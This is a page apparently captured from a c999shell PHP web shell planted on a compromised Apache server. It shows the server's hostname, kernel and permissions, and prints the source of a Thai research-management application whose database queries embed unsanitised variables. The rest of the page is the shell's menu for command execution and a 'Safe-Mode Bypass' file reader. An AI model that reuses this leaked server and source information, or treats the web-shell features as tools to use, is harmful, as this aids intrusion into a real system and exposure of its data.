Software: Apache/2.2.3 (CentOS). PHP/5.1.6 uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44 uid=48(apache) gid=48(apache) groups=48(apache) Safe-mode: OFF (not secure) /var/www/html/manage/ drwxr-xr-x |
Viewing file: Select action/file-type: <?php // session_start(); /** Define Validate Access */ define( '_VALID_ACCESS', 1 ); /** Check Session User Login */ echo "<meta http-equiv=\"Content-Type\" content=\"text/html; charset=windows-874\" />"; /** Configuration */ require_once( "configuration.php" ); require_once( $_Config_absolute_path . "/includes/framework.php" ); require_once( "include/Function.php" ); /** Create Database Object */ $dbObj = new DBConn; //=== SESSION $Username = $valid_user; $sql = "Select * From research_tb"; $result = mysql_query($sql) or die(" Error").mysql_error(); $num = mysql_num_rows($result); /** Config Table for This Page */ $myTable1 = "personal_tb"; $myTable2 = "research_tb"; $myTable2PK = "Research_code"; /** Table --> personal_tb */ $query0 = " SELECT * FROM $myTable1 WHERE Teacher_code='$Teacher_code' "; $result0 = $dbObj->execQuery($query0); $rss = $dbObj->fetchArray($result0); $Teacher_code = $rss['Teacher_code']; /** Paging */ $page = $_GET['page']; if( $page == "" ) { $page = 1; } /** จำนวนข้อมูล ต่อ 1 หน้า */ $perpage = $_REQUEST['perpage']; if( $perpage == "" ) { $perpage = 10; } ?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=windows-874" /> <link href="css/default.css" rel="stylesheet" type="text/css" /> <script language="javascript" src="js/utilities.js"></script> <title>ข้อมูลทั่วไปบุคลากร - ข้อมูลงานวิจัย - ผลงานการวิจัย</title> <style type="text/css"> <!-- .style2 {font-weight: bold} .style3 { font-size: 12; font-weight: bold; } --> </style> </head> <link href="css/default.css" rel="stylesheet" type="text/css" /> <script language="javascript" src="js/utilities.js"></script> <script language="javascript"> function checkData() { var formObj = document.myForm; if( (formObj.Research_name.value == "" ) && (formObj.mYear.value == "" ) && (formObj.mYear2.value == "" ) && (formObj.mYear3.value == "" ) && (formObj.Fund.value == "" ) ) { alert("กรุณากรอกข้อมูลให้ครบด้วยค่ะ" ); formObj.Research_name.style.backgroundColor='#F1F9FC'; formObj.Research_name.focus(); return false; } else if(formObj.Research_name.value == "" ) { alert("กรุณากรอก ชื่อผลงานวิจัย"); formObj.Research_name.style.backgroundColor='#F1F9FC'; formObj.Research_name.focus(); return false;} else if(formObj.mYear.value == "" ) { alert("กรุณากรอก ปีที่เริ่ม"); formObj.mYear.style.backgroundColor='#F1F9FC'; formObj.mYear.focus(); return false;} else if(formObj.mYear2.value == "" ) { alert("กรุณากรอก ปีที่แล้วเสร็จ"); formObj.mYear2.style.backgroundColor='#F1F9FC'; formObj.mYear2.focus(); return false;} else if(formObj.Fund.value == "" ) { alert("กรุณากรอก จำนวนเงินทุน"); formObj.Fund.style.backgroundColor='#F1F9FC'; formObj.Fund.focus(); return false;} else if(formObj.mYear3.value == "" ) { alert("กรุณากรอก ปีที่เผยแพร่"); formObj.mYear3.style.backgroundColor='#F1F9FC'; formObj.mYear3.focus(); return false;} else return true; } </script> <script language="JavaScript" type="text/JavaScript"> function browse() { myform.Filetex.src = myform.Filetex.value; } </script> <body topmargin="0" rightmargin="0" bottommargin="0" leftmargin="0"> <?php include("templates/incHeader.php"); ?> <table width="1003" border="0" cellspacing="0" cellpadding="0"> <tr> <td width="203" align="left" valign="top" style="padding:10px 0px 0px 5px"><?php include( "templates/incMainMenuLeft.php" );?></td> <td width="800" height="440" align="center" valign="top" style="padding:10px 0px 5px 10px"><fieldset> <table width="780" border="0" cellspacing="0" cellpadding="0"> <form action="Research_depart/InsertResearch.php" method="post" enctype="multipart/form-data" name="myForm" id="myForm" onsubmit="return checkData();"> <tr> <td height="5"></td> </tr> <tr> <td height="30" background="images/background/bg-head-topic-w780.gif" class="PADDING-LEFT-10"><strong><a href="index.php">หน้าหลัก</a></strong> <strong>» <span class="NOTE">สรุปงานวิจัยแยกตาม ประเภทงานวิจัย</span></strong></td> </tr> <tr> <td> </td> </tr> <tr> <td><span class="PADDING-TOP-10"><img src="./images/icons/arrow-circle-225-left.png" width="16" height="16" border="0" align="absmiddle" /> <a href="javascript:;" onclick="window.history.back();"><strong>‹ ย้อนกลับ</strong></a></span></td> </tr> <tr> <td> </td> </tr> <tr> <td align="center"><span class="style3"> </span> <table width="484" border="0" align="center" cellpadding="0" cellspacing="1" class="BORDER-GREY" > <tr bordercolor="#0066CC"> <td height="24" colspan="2" align="center" bgcolor="#CCCCCC" style="border:1px solid gray"><strong><font color="#000000" face="Tahoma">ประเภทงานวิจัย</font> </strong> </td> <td width="159" align="center" bgcolor="#CCCCCC" style="border:1px solid gray"><span class="style2"><font face="Tahoma">จำนวนผลงานวิจัย</font></span></td> </tr> <tr bgcolor="#F9FEFF" onmouseover="this.style.backgroundColor='#99CCFF'" onmouseout="this.style.backgroundColor='#F9FEFF'" > <td width="39" height="18" align="center" bgcolor="#F8F8F8"><img src="images/icons/friends16.gif" width="16" height="16" /></td> <? $Research_char="คลีนิค";?> <td width="388" bgcolor="#F8F8F8"><font color="#000000" size="2" face="Tahoma"> คลีนิค </font></td> <td align="center" bordercolor="#EBFAFE" bgcolor="#F8F8F8"><font size="2" face="Tahoma"> <?php $Research_char = $rs[Research_char]; $sql3 ="Select * From research_tb Where Research_char='คลีนิค'"; $result3 = mysql_query($sql3) or die("Error".mysql_error()); $count = mysql_num_rows($result3); echo "$count"; ?> </font></td> </tr> <? ?> <tr bgcolor="#FFFFFF" onmouseover="this.style.backgroundColor='#99CCFF'" onmouseout="this.style.backgroundColor='#FFFFFF'" > <td align="center" bgcolor="#F8F8F8"><img src="images/icons/icon-people-20.gif" width="20" height="20" /></td><? $Research_char="การเรียนการสอน";?> <td bgcolor="#F8F8F8"><font color="#000000" size="2" face="Tahoma"> การเรียนการสอน </font></td> <td align="center" bgcolor="#F8F8F8"><font size="2" face="Tahoma"> <?php $Research_char = $rs[Research_char]; $sql3 ="Select * From research_tb Where Research_char='การเรียนการสอน'"; $result3 = mysql_query($sql3) or die("Error".mysql_error()); $count = mysql_num_rows($result3); echo "$count"; ?> </font></td> </tr> <tr bgcolor="#FFFFFF" onmouseover="this.style.backgroundColor='#99CCFF'" onmouseout="this.style.backgroundColor='#FFFFFF'" > <td align="center" bgcolor="#F8F8F8"><img src="images/icons/user-white.png" width="16" height="16" /></td><? $Research_char="การส่งเสริมสุขภาพ";?> <td bgcolor="#F8F8F8">การส่งเสริมสุขภาพ</td> <td align="center" bgcolor="#F8F8F8"><?php $Research_char = $rs[Research_char]; $sql3 ="Select * From research_tb Where Research_char='การส่งเสริมสุขภาพ'"; $result3 = mysql_query($sql3) or die("Error".mysql_error()); $count = mysql_num_rows($result3); echo "$count"; ?></td> </tr> <tr bgcolor="#FFFFFF" onmouseover="this.style.backgroundColor='#99CCFF'" onmouseout="this.style.backgroundColor='#FFFFFF'" > <td align="center" bgcolor="#F8F8F8"><img src="images/icons/block.png" width="16" height="16" /></td><? $Research_char="อื่นฯ";?> <td bgcolor="#F8F8F8">อื่นฯ</td> <td align="center" bgcolor="#F8F8F8"><?php $Research_char = $rs[Research_char]; $sql3 ="Select * From research_tb Where Research_char='อื่นๆ'"; $result3 = mysql_query($sql3) or die("Error".mysql_error()); $count = mysql_num_rows($result3); echo "$count"; ?></td> </tr> <tr> <td colspan="3" align="center" bgcolor="#FFFFFF"><span class="style2"><font color="#000000" face="Tahoma">ทั้งหมด</font><font color="#FF0000" face="Geneva, Arial, Helvetica, sans-serif"> <? echo $num ?><font color="#000000" face="Tahoma"> คน</font></font></span></td> </tr> </table></td> </tr> <tr> <td> </td> </tr></form> </table> </fieldset></td> </tr> </table> <?php include("templates/incFooter.php"); ?> </body> </html> <?php /** Free Resource */ $dbObj->freeresult($result0); /** Close the Database */ $dbObj->disconn(); /** Unset Class */ unset($dbObj); ?> |
:: Command execute :: | |
:: Shadow's tricks :D :: | |
Useful Commands
|
:: Preddy's tricks :D :: | |
Php Safe-Mode Bypass (Read Files)
|
--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0058 ]-- |